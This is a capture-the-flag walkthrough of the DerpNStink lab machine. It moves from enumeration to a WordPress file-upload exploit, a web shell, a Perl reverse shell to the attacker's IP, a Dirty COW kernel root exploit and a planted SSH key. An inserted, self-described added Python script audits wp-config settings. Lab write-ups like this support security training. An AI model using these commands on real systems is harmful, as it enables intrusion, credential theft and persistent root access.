Derpstink - danielcastropalomares/security GitHub Wiki

Nmap result:

root@kali:/tmp# nmap -A 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-06 19:52 CET
Nmap scan report for 172.31.255.128
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 08:00:27:7A:11:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

If we look at the robots.txt file:

http://172.31.255.128/robots.txt
User-agent: *
Disallow: /php/
Disallow: /temporary/

With OWASP we find a new directory:

http://172.31.255.128/webnotes/info.txt
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --> 

We check whether that user exists:

msf auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.128
RHOSTS => 172.31.255.128
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME stinky
USERNAME => stinky
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.128:22 - SSH - Using malformed packet technique
[*] 172.31.255.128:22 - SSH - Starting scan
[+] 172.31.255.128:22 - SSH - User 'stinky' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Inside the webnotes directory we find:

http://172.31.255.128/webnotes/

[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local
Domain Name: derpnstink.local
Registry Domain ID: 2125161577_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.fakehosting.com
Registrar URL: http://www.fakehosting.com
Updated Date: 2017-11-12T16:13:16Z
Creation Date: 2017-11-12T16:13:16Z
Registry Expiry Date: 2017-11-12T16:13:16Z
Registrar: fakehosting, LLC
Registrar IANA ID: 1337
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-11-12T16:13:16Z <<<
For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy.

By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars.

[stinky@DeRPnStiNK: /var/www/html/php]~$ ping derpnstink.local
PING derpnstink.local (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.018 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.025 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.023 ms
64 bytes from localhost (127.0.0.1): icmp_seq=5 ttl=64 time=0.022 ms
64 bytes from localhost (127.0.0.1): icmp_seq=6 ttl=64 time=0.025 ms
64 bytes from localhost (127.0.0.1): icmp_seq=7 ttl=64 time=0.026 ms
^C
--- derpnstink.local ping statistics ---
7 packets transmitted, 7 received, 0% packet loss, time 5998ms
rtt min/avg/max/mdev = 0.015/0.022/0.026/0.003 ms
stinky@DeRPnStiNK:~$

Inside the php directory we find phpMyAdmin:

http://derpnstink.local/php/phpmyadmin

With nmap and the http-enum script we find more directories:

root@kali:~# nmap -sT -T3 -PS80,443,8000,8443,8800 -p 80,443,8000,8443,8080 -script=http-enum  172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-09 18:12 CET
Nmap scan report for derpnstink.local (172.31.255.128)
Host is up (0.00054s latency).

PORT     STATE  SERVICE
80/tcp   open   http
| http-enum: 
|   /weblog/: Blog
|   /robots.txt: Robots file
|_  /weblog/wp-login.php: Wordpress login page.
443/tcp  closed https
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
MAC Address: 08:00:27:7A:11:17 (Oracle VirtualBox virtual NIC)

We can access the WordPress administration page with the credentials admin:admin

http://derpnstink.local/weblog/wp-admin/profile.php

If we run a wpscan scan, we see that it has several outdated plugins:

 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
 |     Fixed in: 1.4.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7532
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
 |      - https://www.exploit-db.com/exploits/34681/
 |      - https://www.exploit-db.com/exploits/34514/
 |      - http://seclists.org/bugtraq/2014/Sep/1
 |      - http://packetstormsecurity.com/files/131526/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
 |     Fixed in: 1.5.3.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8263
 |      - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
 |      - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8786
 |      - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
 |      - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
 |
 | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8795
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
 |      - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
 |      - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
 |

Let's upload a shell to WordPress:

WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python) | exploits/php/webapps/34681.txt
cd /tmp
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
cp /usr/share/exploitdb/exploits/php/webapps/34681.txt /tmp/wp_gallery_slideshow_146_suv.py
python wp_gallery_slideshow_146_suv.py -t http://derpnstink.local/weblog -u admin -p admin -f shell.php

Now we can access the shell via the web:

http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php

We look for executables with the SUID bit set:

p0wny@shell:…/uploads/slideshow-gallery# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/bin/ping
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

We look for the database access credentials:

p0wny@shell:…/html/weblog# locate wp-config.php
/var/www/html/weblog/wp-config.php
p0wny@shell:…/html/weblog# cat /var/www/html/weblog/wp-config.php | grep DB_*
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
define('SECURE_AUTH_SALT', '14EV-M=x?/lW3ODB7ro^;}&J4&ggBY#xohsa&7ZX/l[Xp,P;DY;AbPDA4oO#<vKd');
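The wp-config.php lines above are exactly what a defender should audit before an attacker reads them: an added Python example (not part of the original writeup) that parses the define() entries and flags a root database user, a weak password, missing or sample-default salts, and a world-readable file. The weak-password list and the 12-character minimum are assumptions; the sample input is built from the values shown on this page.

```python
import re

# Sample wp-config.php fragment, constructed from the values shown on this page.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
define('SECURE_AUTH_SALT', '14EV-M=x?/lW3ODB7ro^;}&J4&ggBY#xohsa&7ZX/l[Xp,P;DY;AbPDA4oO#<vKd');
"""

# Matches define('NAME', 'value'), allowing escaped quotes inside the value.
DEFINE_RE = re.compile(r"define\(\s*'([A-Z0-9_]+)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)")

# Placeholder that wp-config-sample.php ships for every salt.
DEFAULT_SALT = "put your unique phrase here"
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# Assumed list of trivially guessable database passwords.
WEAK_PASSWORDS = {"", "mysql", "root", "password", "wordpress", "admin"}


def parse_defines(text):
    """Return {NAME: value} for every define('NAME', 'value') in the PHP source."""
    return {name: value for name, value in DEFINE_RE.findall(text)}


def audit_wp_config(text, file_mode=None):
    """Return a list of findings; file_mode is the st_mode of wp-config.php if known."""
    cfg = parse_defines(text)
    findings = []
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is 'root': WordPress should use a least-privilege MySQL account")
    password = cfg.get("DB_PASSWORD", "")
    if password.lower() in WEAK_PASSWORDS or len(password) < 12:
        findings.append("DB_PASSWORD is weak or shorter than 12 characters")
    for key in SALT_KEYS:
        if cfg.get(key) is None or cfg.get(key) == DEFAULT_SALT:
            findings.append(f"{key} missing or left at the sample default")
    if cfg.get("DB_HOST", "localhost") not in ("localhost", "127.0.0.1"):
        findings.append("DB_HOST is remote: credentials travel over the network")
    if file_mode is not None and file_mode & 0o004:  # 'other' read bit set
        findings.append("wp-config.php is world-readable (e.g. from a web shell)")
    return findings


if __name__ == "__main__":
    for finding in audit_wp_config(SAMPLE_WP_CONFIG, file_mode=0o644):
        print("[!]", finding)
```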

In the FTP configuration we find the user stinky:

cat /etc/vsftpd.userlist
stinky

Now we set up a reverse shell, since we cannot run the kernel exploit through the PHP shell's expect. Attacker machine:

nc -vlp 8080

Victim machine:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.31.255.141:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Now from our Kali we see that the connection to port 8080 has been established; let's use the Python shell:

python -c 'import pty;pty.spawn("/bin/bash")'

We run kernelpop-master:

wget https://github.com/spencerdodd/kernelpop/archive/master.zip
unzip master.zip
cd kernelpop-master/
python kernelpop.py
<w/html/weblog/kernelpop-master$ python kernelpop.py                         

##########################
#  welcome to kernelpop  #
#                        #
# let's pop some kernels #
##########################

[*] grabbing distro version and release from underlying OS (linuxubuntu14)
[*] grabbing kernel version from 'uname -a'
[!] could only get the kernel base...may not have accurate matches
[+] kernel (Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux) identified as:
[base]
	type:			linux
	distro:			linuxubuntu14
	version:		4.4.0-31
	architecture:		i686
[!] no specific distro kernel discovered...likelihood of false positives is high
[*] matching kernel to known exploits
[+] discovered 10 possible exploits !
	[ base linux kernel vulnerable ]
		CVE20177308	`packet_set_ring` in net/packet/af_packet.c can gain privileges via crafted system calls.
		CVE20162384	Double free vulnerability in the `snd_usbmidi_create` (requires physical proximity)
		CVE20165195_32	Dirty COW race condition root priv esc for 32 bit
		CVE20165195_32_poke	Dirty COW race condition root priv esc for 32 bit (poke variant)
		CVE20173630	Stack clash vuln in solaris
		CVE20176074	`dccp_rcv_state_process` in net/dccp/input.c mishandles structs and can lead to local root
		CVE201716996	eBPF Verifier check_alu_op() Sign Extension Local Root Exploit
		CVE20171000112	ip_ufo_append_data() memory corruption flaw can be exploited to gain root privileges.
		CVE20171000367	sudo get_process_ttyname() root priv esc
		CVE20171000373	Stack clash vulnerability from qualys 

We install the 32-bit version:

python kernelpop.py -e CVE20165195_32

We stabilize the system and copy our SSH key:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoj4wKvDUX1MpL2ZXXXXXXXXXXXXXXXXXX root@kali" > /root/.ssh/authorized_keys

Now we can log in via SSH as the root user:

root@kali:~# ssh [email protected]
Ubuntu 14.04.5 LTS


	               ,~~~~~~~~~~~~~..
	               '  Derrrrrp  N  `
	,~~~~~~,       |    Stink      | 
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)   
    (*)  ; (^)(^)':
	=;  ____  ;
	  ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
	  "      "=
	   >     <
	  ="     "-
	  -`.   ,'
	        -
	    `--'

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

472 packages can be updated.
375 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@DeRPnStiNK:~#